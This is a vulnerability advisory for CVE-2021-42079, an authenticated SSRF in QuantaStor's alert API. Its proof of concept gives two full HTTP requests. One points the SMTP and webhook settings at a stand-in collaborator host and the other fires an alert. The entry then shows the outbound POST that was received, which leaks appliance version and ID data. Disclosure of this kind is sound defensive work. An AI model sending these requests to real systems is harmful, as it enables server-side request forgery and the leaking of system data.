CVE-2021-42079

*** Pendiente de traducción *** An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br /> <br /> POC<br /> <br /> Step 1: Prepare the SSRF with a request like this:<br /> <br /> GET /qstorapi/alertConfigSet?senderEmailAddress=a&amp;smtpServerIpAddress=BURPCOLLABHOST&amp;smtpServerPort=25&amp;smtpUsername=a&amp;smtpPassword=1&amp;smtpAuthType=1&amp;customerSupportEmailAddress=1&amp;poolFreeSpaceWarningThreshold=1&amp;poolFreeSpaceAlertThreshold=1&amp;poolFreeSpaceCriticalAlertThreshold=1&amp;pagerDutyServiceKey=1&amp;slackWebhookUrl=http://&amp;enableAlertTypes&amp;enableAlertTypes=1&amp;disableAlertTypes=1&amp;pauseAlertTypes=1&amp;mattermostWebhookUrl=http://<br /> HTTP/1.1<br /> <br /> Host: <br /> Accept-Encoding: gzip, deflate<br /> <br /> Accept: */*<br /> Accept-Language: en<br /> <br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br /> <br /> Connection: close<br /> <br /> authorization: Basic <br /> Content-Type: application/json<br /> <br /> Content-Length: 0<br /> <br /> Step 2: Trigger this alert with this request<br /> <br /> GET /qstorapi/alertRaise?title=test&amp;message=test&amp;severity=1 <br /> HTTP/1.1<br /> <br /> Host: <br /> Accept-Encoding: gzip, deflate<br /> <br /> Accept: */*<br /> <br /> Accept-Language: en<br /> <br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br /> <br /> Connection: close<br /> <br /> authorization: Basic <br /> Content-Type: application/json<br /> <br /> Content-Length: 1<br /> <br /> The post request received by looks like this:<br /> {<br />  <br /> ### Python FLASK stuff ####<br /> <br />  &amp;#39;endpoint&amp;#39;: &amp;#39;index&amp;#39;, <br />  <br /> &amp;#39;method&amp;#39;: &amp;#39;POST&amp;#39;, <br />  <br /> &amp;#39;cookies&amp;#39;: ImmutableMultiDict([]), <br />  <br /> ### END Python FLASK stuff ####<br /> <br />  <br /> &amp;#39;data&amp;#39;: b&amp;#39;{ <br />   "attachments": [ <br />    {<br /> <br />     "fallback": "[122] test / test.",<br /> <br />     "color": "#aa2222",<br /> <br />     "title": "[122] test",<br /> <br />     "text": "test",<br /> <br />     "fields": [   <br />      {    <br /> <br />       "title": "Alert Severity",<br />    <br />       "value": "CRITICAL",<br />    <br />       "short": false  <br />      },  {   <br />       "title": "Appliance",     <br />       "value": "quantastor (https://)",<br />     <br />       "short": true  <br /> <br />      },  {    <br /> <br />       "title": "System / Driver / Kernel Ver",    <br /> <br />       "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",    <br /> <br />       "short": false  <br /> <br />      },  {    <br /> <br />       "title": "System Startup",    <br /> <br />       "value": "Fri Aug  6 16-02-55 2021",    <br /> <br />       "short": true  <br /> <br />       },  {    <br /> <br />       "title": "SSID",    <br /> <br />       "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",    <br /> <br />       "short": true  <br /> <br />      },<br />     ],<br /> <br />     "footer": "QuantaStor Call-home Alert",<br /> <br />     "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",<br /> <br />     "ts": 1628461774<br />    }<br />   ], <br />   "mrkdwn":true <br />  }&amp;#39;, <br />  #### FLASK REQUEST STUFF #####<br /> <br />  &amp;#39;headers&amp;#39;: {<br /> <br />   &amp;#39;Host&amp;#39;: &amp;#39;&amp;#39;, <br />   &amp;#39;User-Agent&amp;#39;: &amp;#39;curl/7.58.0&amp;#39;, <br />   &amp;#39;Accept&amp;#39;: &amp;#39;*/*&amp;#39;, <br />   &amp;#39;Content-Type&amp;#39;: &amp;#39;application/json&amp;#39;, <br />   &amp;#39;Content-Length&amp;#39;: &amp;#39;790&amp;#39;<br /> <br />  }, <br />  &amp;#39;args&amp;#39;: ImmutableMultiDict([]), <br />  &amp;#39;form&amp;#39;: ImmutableMultiDict([]), <br />  &amp;#39;remote_addr&amp;#39;: &amp;#39;217.103.63.173&amp;#39;, <br />  &amp;#39;path&amp;#39;: &amp;#39;/payload/58&amp;#39;, <br />  &amp;#39;whois_ip&amp;#39;: &amp;#39;TNF-AS, NL&amp;#39;<br /> }<br /> <br /> #### END FLASK REQUEST STUFF #####